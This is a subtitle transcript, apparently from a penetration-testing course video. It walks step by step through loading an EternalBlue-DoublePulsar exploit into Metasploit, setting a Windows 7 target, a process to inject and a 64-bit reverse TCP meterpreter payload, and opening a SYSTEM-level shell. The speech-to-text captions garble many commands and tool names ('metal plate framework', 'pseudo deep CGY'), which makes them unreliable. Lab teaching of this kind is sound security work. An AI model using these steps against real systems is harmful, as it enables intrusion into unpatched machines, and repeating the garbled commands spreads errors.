1
00:00:00,560 --> 00:00:01,280
Welcome back.

2
00:00:01,760 --> 00:00:08,570
Time to check out a variant of Eternal Blue explained, I prefer to always use this one due to two different

3
00:00:08,570 --> 00:00:09,080
reasons.

4
00:00:09,470 --> 00:00:13,250
It showed to work more than the default metal plate framework explained.

5
00:00:13,430 --> 00:00:20,340
And it also has a little better options aimed at both 32 and 64 bit Windows systems.

6
00:00:21,020 --> 00:00:25,020
Nonetheless, we can read more about double pulser right here.

7
00:00:25,760 --> 00:00:27,700
This is the official Rapide seven website.

8
00:00:27,710 --> 00:00:34,610
And here we can check out what exactly is a double pulser when it is used and when did it come out.

9
00:00:35,100 --> 00:00:41,090
So here it says double pulser is an implant leaked by the shadow brokers group earlier this year that

10
00:00:41,090 --> 00:00:44,030
enables the execution of additional malicious code.

11
00:00:44,660 --> 00:00:50,330
So you can read right here, but you can also check out different websites in order to find out how

12
00:00:50,330 --> 00:00:53,770
exactly does the expert work in case you're interested in that.

13
00:00:53,780 --> 00:00:58,070
But what is important for us in this video is how to run the exploit.

14
00:00:58,650 --> 00:01:04,280
Remember, we have no model in Matus plate framework for the eternal double pulser.

15
00:01:04,880 --> 00:01:10,100
So we must download the exploit ourselves and import it in matters framework.

16
00:01:10,490 --> 00:01:15,200
This will be a little bit of a longer video since there are a few things that we need to do to achieve

17
00:01:15,200 --> 00:01:15,950
this exploit.

18
00:01:16,700 --> 00:01:20,240
The first thing that we must do is install one.

19
00:01:20,750 --> 00:01:21,980
And what is wine?

20
00:01:22,700 --> 00:01:28,790
Well, Fine is a program that allows us to execute Windows applications on Linux systems.

21
00:01:29,240 --> 00:01:30,200
Why do we need this?

22
00:01:30,830 --> 00:01:35,260
Well, it is required for double pulser to run to install it.

23
00:01:35,570 --> 00:01:43,910
We can run the following comment pseudo deep CGY, dash, dash and dash architecture.

24
00:01:46,430 --> 00:01:53,420
I three, eight, six, and then these two signs, which mean that we are going to add another comment

25
00:01:53,660 --> 00:02:03,440
to this larger comment and that is apt, get update and another comment is apt to get installed.

26
00:02:03,830 --> 00:02:04,800
Win32.

27
00:02:05,330 --> 00:02:07,340
So these are three separate comments.

28
00:02:07,490 --> 00:02:11,060
And in the last one, we are going to install the Win32.

29
00:02:11,720 --> 00:02:16,830
If you press, enter and type in the password, this command should start executing.

30
00:02:17,240 --> 00:02:24,080
Now, if it tells you right here this, which is permission denied, then just copy this command without

31
00:02:24,080 --> 00:02:33,050
the pseudo enter the root terminal by typing pseudo seal and then paste the command press enter and

32
00:02:33,050 --> 00:02:36,140
now it should start executing all of these three commands.

33
00:02:36,710 --> 00:02:41,180
Now our control see this because I have already performed this for you.

34
00:02:41,450 --> 00:02:44,710
Just wait for this to finish and then proceed with the editorial.

35
00:02:45,260 --> 00:02:51,350
And the reason why we are doing all of this is because we need to get find directory with the drive

36
00:02:51,530 --> 00:02:51,980
folder.

37
00:02:52,730 --> 00:02:56,990
And you might be asking, well, what is that and where do I even find it?

38
00:02:57,410 --> 00:03:00,490
Well, sometimes it won't appear after installation.

39
00:03:00,920 --> 00:03:04,700
So what we must do is install some Windows program.

40
00:03:05,270 --> 00:03:12,470
In this case, let's just go and install Python two four windows on our Kalinda's machine, not because

41
00:03:12,470 --> 00:03:18,040
we need it, but because after we install it, our drive C folder will appear.

42
00:03:18,320 --> 00:03:23,480
And if you have no idea what I'm talking about, hang on for just a second and you will see it after

43
00:03:23,480 --> 00:03:24,650
we install in this program.

44
00:03:25,130 --> 00:03:27,890
It is all required for our expert to run.

45
00:03:28,640 --> 00:03:38,030
So navigate to this link right here, which is https w w w dot python dot org slash downloads, slash

46
00:03:38,030 --> 00:03:43,340
release and then slash python dash two seven one four and slash at the end.

47
00:03:44,090 --> 00:03:46,340
Here we should see this version of Python.

48
00:03:46,610 --> 00:03:50,670
And what we are interested in from all of these versions is Windows XP.

49
00:03:50,680 --> 00:03:53,030
Eighty six MSA installer.

50
00:03:53,850 --> 00:04:01,530
Click on it and click on Save File, it will start downloading our Windows installer and once it has

51
00:04:01,530 --> 00:04:01,980
finished.

52
00:04:02,220 --> 00:04:06,960
We want to go to the downloads directory and open terminal inside of it.

53
00:04:07,710 --> 00:04:12,600
Once it does that, we can run the command line MSA execute.

54
00:04:14,110 --> 00:04:21,490
I and then the name of the file, which in my case and in your case will be Python two point seven point

55
00:04:21,490 --> 00:04:22,630
fourteen dot.

56
00:04:23,980 --> 00:04:27,310
Just a small interrupt this command that I just showed you.

57
00:04:28,090 --> 00:04:31,420
Make sure to execute it using fruit terminal.

58
00:04:31,570 --> 00:04:35,130
So do not executed using our regular Mr. Hacker terminal.

59
00:04:35,230 --> 00:04:38,590
Otherwise, in most cases, it might not actually work.

60
00:04:38,800 --> 00:04:41,140
So what you can do is you can just type pseudo.

61
00:04:41,470 --> 00:04:50,800
You enter the password for your account and run the find MSA execute slash I and then the name of the

62
00:04:50,800 --> 00:04:52,900
file using fruit terminal.

63
00:04:53,320 --> 00:04:55,150
OK, let's go back to the video.

64
00:04:56,540 --> 00:05:04,220
Click, enter, and this will start installing Python two point seven point fourteen as a Windows program.

65
00:05:04,580 --> 00:05:07,670
We want to click on Next on Every Step.

66
00:05:07,700 --> 00:05:09,770
So next next next next show.

67
00:05:09,770 --> 00:05:11,150
This already exists.

68
00:05:11,310 --> 00:05:12,050
I will click on.

69
00:05:12,050 --> 00:05:12,560
Yes.

70
00:05:13,570 --> 00:05:16,890
And this installation should finish in just a few seconds.

71
00:05:18,610 --> 00:05:20,620
Once it is done, you can click on Finish.

72
00:05:20,950 --> 00:05:26,140
And right now we should have our wine folder in the root directory.

73
00:05:26,620 --> 00:05:31,420
So if I go to this directly, I need to go see the root.

74
00:05:34,780 --> 00:05:43,680
Let us just enter the terminal and go to the root directory, if we type, yes, it will be empty.

75
00:05:44,500 --> 00:05:45,700
Did we fail somewhere?

76
00:05:46,000 --> 00:05:47,260
Well, not exactly.

77
00:05:47,440 --> 00:05:53,290
Once installed, wine will be a hidden directory, which means its name will start with a dot.

78
00:05:53,560 --> 00:05:59,350
And by the way, to list all the files inside of a directory, including hidden files, we can run the

79
00:05:59,350 --> 00:06:08,620
command ls ALP and hear all the hidden files, including our DOT find the rectory.

80
00:06:09,170 --> 00:06:17,320
Now, if you cannot see it, make sure that you run this command, which is why MSRA execute I Python

81
00:06:17,320 --> 00:06:21,280
two point seven point fourteen from the root terminal.

82
00:06:21,850 --> 00:06:28,470
And just click on next next next steps and you should have this dot find folder inside of the root directory.

83
00:06:29,380 --> 00:06:29,850
Great.

84
00:06:30,160 --> 00:06:38,790
So if I go to that folder CD dot fine here I will have drive C folder and some other folders as well.

85
00:06:39,580 --> 00:06:41,550
So everything works for now.

86
00:06:42,100 --> 00:06:49,060
Now that we got this ready, we can proceed to download our exploit, go once again to the Firefox,

87
00:06:49,420 --> 00:06:55,990
open a second step and type eternal blue double pulser and it'll show up this first link, which is

88
00:06:55,990 --> 00:06:56,440
a GitHub.

89
00:06:56,860 --> 00:06:57,910
We want to click on it.

90
00:06:58,180 --> 00:07:03,190
And since we already know how to install our GitHub tool, let's just do it real quick.

91
00:07:03,220 --> 00:07:05,020
We just want to copy this link right here.

92
00:07:06,850 --> 00:07:08,240
Go inside our terminal.

93
00:07:08,770 --> 00:07:14,290
Let's change the directory to the home.

94
00:07:14,720 --> 00:07:21,550
Mr. Hacker, slash the directory and once again, our advise you to run all of these commands using

95
00:07:21,550 --> 00:07:22,380
through the terminal.

96
00:07:22,390 --> 00:07:25,900
Otherwise it might not work and type to clone.

97
00:07:27,370 --> 00:07:35,260
Basic command, and it should download the eternal blood cancer tool for us now, we are not done yet.

98
00:07:35,800 --> 00:07:41,770
We must do some modification in order for this tool to be able to open in the metastatic framework.

99
00:07:42,310 --> 00:07:49,420
If we type place and change to the eternal blue pulser right here, we should have two interesting files.

100
00:07:49,810 --> 00:07:56,200
One of them is the ruby file, which is the expert itself, and the other one is this deps directory.

101
00:07:56,740 --> 00:07:57,880
Now this is a directory.

102
00:07:57,880 --> 00:08:03,310
Once again, it is not the file and you cannot really see that from the root terminal because different

103
00:08:03,310 --> 00:08:05,290
file types are not different colors.

104
00:08:05,650 --> 00:08:07,630
And that is the only problematic thing.

105
00:08:08,520 --> 00:08:14,490
But nonetheless, what we must do is we must copy these two files.

106
00:08:14,520 --> 00:08:16,650
So let's go with copy Depp's first.

107
00:08:18,080 --> 00:08:19,940
To the user share.

108
00:08:21,130 --> 00:08:32,020
Metal plate framework modules exploits Windows and then SMB, and here we can copy the depth directory

109
00:08:32,260 --> 00:08:33,520
and to copy at the rectory.

110
00:08:33,550 --> 00:08:36,240
You just need to add Besch are at the end.

111
00:08:36,490 --> 00:08:46,660
So once again, copying taps directly to this user SlideShare framework modules exploit windows and

112
00:08:46,660 --> 00:08:51,790
then slash Sambi click enter and it should copy the depth directory there.

113
00:08:52,300 --> 00:08:58,150
We want to do the same thing with the internal blue ruby file copy to the same directory.

114
00:09:01,890 --> 00:09:04,470
Modules exploit Windows Assembly.

115
00:09:04,710 --> 00:09:10,470
And here we want to keep it just for this file, you don't need to add a dash R since it is a file and

116
00:09:10,470 --> 00:09:11,550
not a directory.

117
00:09:12,120 --> 00:09:12,920
OK, great.

118
00:09:13,440 --> 00:09:18,300
There is one more location that we want to copy both of these files, so we'll just type once again

119
00:09:18,660 --> 00:09:19,560
the same comment.

120
00:09:19,950 --> 00:09:27,890
Just this time I will switch the location to this root directory so we'll copy the depths in this route

121
00:09:28,110 --> 00:09:33,930
at this are at the end and double copy the eternal glue to this root directory as well.

122
00:09:35,400 --> 00:09:35,820
Great.

123
00:09:36,120 --> 00:09:37,770
Now we should be ready to go.

124
00:09:38,100 --> 00:09:40,230
Let us open our MSF council.

125
00:09:41,510 --> 00:09:47,210
While this is opening, make sure that your Windows seven machine is up and running and let us straightaway

126
00:09:47,210 --> 00:09:53,480
check out the IP address of these Windows seven machine by typing IP config when to that 168, that

127
00:09:53,570 --> 00:09:54,290
eight for me.

128
00:09:55,010 --> 00:10:01,550
And what we want to do once the display opens up is we want to navigate to our eternal blue double pulser

129
00:10:01,820 --> 00:10:02,440
exploit.

130
00:10:02,720 --> 00:10:07,350
And remember, we put it inside of the windows, exploit and sambi exploit.

131
00:10:07,700 --> 00:10:15,530
So what we can do is we can use exploit windows SMB type the name of the exploit which is eternal blue

132
00:10:15,770 --> 00:10:16,570
double pulser.

133
00:10:16,940 --> 00:10:22,490
So just type eternal blue underscore double click enter.

134
00:10:23,210 --> 00:10:27,110
And now we got our exploit imported in metabolised framework.

135
00:10:27,530 --> 00:10:29,810
This is an exploit that we didn't have before.

136
00:10:30,410 --> 00:10:32,060
Let us show information for it.

137
00:10:32,570 --> 00:10:38,150
As it says in the description, this module exploits availability on SMB version one and version two

138
00:10:38,150 --> 00:10:40,300
protocols through eternal blue.

139
00:10:40,910 --> 00:10:45,540
After that, double pulser is used to inject remotely a malicious DL.

140
00:10:46,550 --> 00:10:47,020
Great.

141
00:10:47,480 --> 00:10:50,480
Let's also show options to see what options we got.

142
00:10:51,080 --> 00:10:56,540
And up here we got quite a few of them and keep in mind that all of them are required.

143
00:10:57,560 --> 00:11:04,010
Now, here, it tells us that we need to specify the path to the depths, the rectory, so it seems

144
00:11:04,010 --> 00:11:09,830
that I made a mistake before I copied it directly to the root directory and we had to copy the entire

145
00:11:09,830 --> 00:11:10,160
file.

146
00:11:10,310 --> 00:11:19,280
So what I'm going to do is I'm going to open a second terminal, enter the root terminal, go to the

147
00:11:19,430 --> 00:11:26,060
desktop of our Mr. Hacker account and copy this entire internal blue double pulser matter split to the

148
00:11:26,090 --> 00:11:27,260
root directory.

149
00:11:27,440 --> 00:11:31,150
So copy eternal blue to this root.

150
00:11:31,460 --> 00:11:38,420
Make sure to add dash r because we are copying a directory and right now this path should be good and

151
00:11:38,420 --> 00:11:39,830
we should not really change it.

152
00:11:39,960 --> 00:11:44,990
We can just leave it right here, since that's the rectory is inside of the eternal blue double pulser

153
00:11:44,990 --> 00:11:48,360
directory and we just copied it to the root directory.

154
00:11:48,380 --> 00:11:51,200
So these two are good under the process.

155
00:11:51,200 --> 00:11:56,960
Inject it tells us right here name of the process to ejecta and we must change to this process.

156
00:11:56,960 --> 00:12:00,020
Name right here for 64 bit machines.

157
00:12:00,530 --> 00:12:07,880
Since my Windows seven machine is a 64 bit, I will type this name right here and change the process

158
00:12:07,880 --> 00:12:12,980
to eject since it is not set right here by default, sir type set process.

159
00:12:12,980 --> 00:12:18,460
Inject and paste the name of the process and press enter.

160
00:12:18,890 --> 00:12:25,620
If your Windows seven machine is a 32 bit one, you can leave this w Alam's Dotti the process to inject

161
00:12:25,630 --> 00:12:27,260
it to our hosts.

162
00:12:27,260 --> 00:12:33,300
We already know to be the IP address, so why not do it at 168 eight the airport we are going to leave

163
00:12:33,300 --> 00:12:34,220
to four, four five.

164
00:12:34,490 --> 00:12:35,900
The target architecture.

165
00:12:36,110 --> 00:12:42,500
If your Windows machine is a 32 bit, you can leave it to exit six my is sixty four bit.

166
00:12:42,500 --> 00:12:47,540
So I will set the target architecture to X sixty four.

167
00:12:49,210 --> 00:12:54,900
The wine path, and this is why we needed the wine for we need to set the wine path in order for all

168
00:12:54,900 --> 00:12:55,590
of this to work.

169
00:12:55,770 --> 00:12:57,770
And right here it is set correctly.

170
00:12:57,990 --> 00:13:04,770
Remember, our wine folder is inside of the food directory and the drive folder is inside of the DOT

171
00:13:04,920 --> 00:13:05,740
wine directory.

172
00:13:05,910 --> 00:13:07,680
So this is something that we will not change.

173
00:13:08,310 --> 00:13:12,590
Another configuration that we want to do is this payload options right here.

174
00:13:13,200 --> 00:13:16,670
It is currently set to Windows Interpretor Reverse DCP.

175
00:13:17,160 --> 00:13:23,370
And remember, in one of the last few videos, I told you that this is a payload for 32 bit windows.

176
00:13:23,970 --> 00:13:27,990
If your windows is 32 bit, once again, you don't need to change this.

177
00:13:27,990 --> 00:13:40,350
But if it is a 64 bit windows, I want to type set payload Windows X 64 and interpreter reverse DCP

178
00:13:41,850 --> 00:13:43,230
show options once again.

179
00:13:44,680 --> 00:13:46,450
Everything seems to be good now.

180
00:13:46,660 --> 00:13:51,940
You can also show targets if you want to, just to see what are all the possible targets that you can

181
00:13:51,940 --> 00:13:53,440
attack with this exploit.

182
00:13:54,100 --> 00:13:57,750
And once you check all of that out, you can just type front.

183
00:13:59,070 --> 00:14:03,790
This will launch our eternal blue double pulser exploit on target machine.

184
00:14:04,620 --> 00:14:07,110
It might take a few seconds for it to work.

185
00:14:09,520 --> 00:14:18,400
And here it is, our interpreter session is once again open exploit for successfully and we can once

186
00:14:18,400 --> 00:14:25,290
again from the comments on the target system, we can enter a shell and get its command prompt.

187
00:14:25,300 --> 00:14:26,590
If I type who I my.

188
00:14:27,600 --> 00:14:32,930
It says that we are the system level account, so we are the highest privilege account once again,

189
00:14:33,570 --> 00:14:33,890
great.

190
00:14:34,320 --> 00:14:39,600
Now I know you're impatiently waiting for us to cover this interpretor shell and all of its comments,

191
00:14:39,600 --> 00:14:41,510
as well as the post exploitation modules.

192
00:14:41,610 --> 00:14:42,570
We can run with it.

193
00:14:42,870 --> 00:14:45,180
But hang on for just a little bit more.

194
00:14:45,740 --> 00:14:52,230
We got two more experts to cover and then we can proceed to creating our malicious files and using them

195
00:14:52,230 --> 00:14:54,330
as well as running post exploitation modules.

196
00:14:55,020 --> 00:15:01,400
In the next video, we're going to cover an expert called Blue Keep, which was discovered in thousand

197
00:15:01,400 --> 00:15:01,920
nineteen.

198
00:15:02,340 --> 00:15:03,000
See you there.